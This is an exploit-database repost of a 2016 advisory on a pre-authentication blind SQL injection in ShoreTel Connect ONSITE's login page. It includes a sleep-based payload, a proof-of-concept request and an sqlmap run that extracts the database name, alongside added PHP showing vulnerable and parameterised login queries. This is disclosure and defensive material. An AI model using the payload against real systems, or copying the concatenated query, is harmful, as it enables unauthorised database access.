ShoreTel Connect ONSITE - Blind SQL Injection

ID 1337DAY-ID-25463
Type zdt
Reporter Iraklis Mathiopoulos
Modified 2016-09-19T00:00:00


Exploit for php platform in category web applications

# Exploit Title: ShoreTel Connect ONSITE Blind SQL Injection Vulnerability
# Date: 19-09-2016
# Software Link:
# Exploit Author: Iraklis Mathiopoulos
# Contact:
# Website:
# Category: webapps
1. Description
Versions of ShoreTel Connect ONSITE up to and including 21.79.4311.0
are vulnerable to a Blind SQL Injection in /authenticate.php on the web server
that runs the Conference system.
Specifically, the POST parameter "username" is not sanitised before being used
in SQL queries. Using test'%20and%20(select*from(select(sleep(35)))a)--%20
as the username value, the server responds after approximately 35 seconds.
No authentication is needed to exploit the vulnerability, as the issue
resides in the pre-authentication part of the system.
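The root cause described above is string concatenation of the "username" POST value into SQL text. The following is an added illustration, not ShoreTel's code: a minimal pre-authentication lookup in the style of /authenticate.php, showing the vulnerable pattern beside the hardened one. The table and column names (users, username, password_hash), the database name and the connection credentials are assumptions for illustration.

```php
<?php
// Added example, not ShoreTel code. Schema (users.username, users.password_hash)
// and connection details are assumed for illustration.

// VULNERABLE pattern: the POST value becomes part of the SQL text, so a
// username carrying a quote and a sleep() subquery (as in the advisory)
// changes the statement and the server stalls for the requested time.
function findUserUnsafe(PDO $pdo, string $username): ?array
{
    $sql = "SELECT id, password_hash FROM users WHERE username = '" . $username . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED pattern: a server-side prepared statement with a bound parameter.
// The same input reaches MySQL as a literal string value and cannot alter
// the query structure, so the injected sleep() is never executed.
function findUserSafe(PDO $pdo, string $username): ?array
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :username');
    $stmt->bindValue(':username', $username, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection settings that matter for this bug class: turn off client-side
// prepare emulation so the MySQL driver uses real server-side prepares, and
// raise exceptions instead of silently continuing after a failed query.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=conference;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);

// Pre-authentication handler: the untrusted value is only ever bound, never
// concatenated. Credential checking uses password_verify() on a stored hash.
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$user = findUserSafe($pdo, $username);
if ($user === null || !password_verify($password, $user['password_hash'])) {
    http_response_code(401);
    exit('Sign in failed');
}
```

Beyond the code change, the sqlmap run below is a useful detection hint for operators: time-based blind injection shows up as a burst of POST requests to /authenticate.php from one client whose response times cluster around the injected delay, which is visible in a web server log that records request duration.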
2. Proof of Concept
POST https://[REDACTED].com/authenticate.php HTTP/1.1
Host: [REDACTED].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[REDACTED].com/signin.php?ret=index.php&brand=1&brandUrl=index.php&rand=377311852
Cookie: PHPSESSID=fd3eb46033541487cce7774b917c655d
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
---
[email protected]:~/projects# sqlmap -r req.burp -p username --dbms=mysql
--technique=T --time-sec=10  --level=5 --risk=3 --current-db
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201607120a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|
[*] starting at 19:59:34
[19:59:34] [INFO] parsing HTTP request from 'req.burp'
[19:59:34] [INFO] testing connection to the target URL
[19:59:42] [INFO] checking if the target is protected by some kind of
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw==&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123'
'jIev&vpassword=&SUBMIT1=Sign In
---
[19:59:54] [INFO] testing MySQL
[20:02:25] [INFO] confirming MySQL
[20:03:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[20:03:12] [INFO] fetching current database
[20:03:12] [INFO] retrieved: [REDACTED]
current database:    '[REDACTED]'
[20:21:10] [INFO] fetched data logged to text files under
[*] shutting down at 20:21:10
3. Solution:
Install the latest version of ShoreTel Connect ONSITE
Related ShoreTel security bulletin:

# [2018-02-19]  #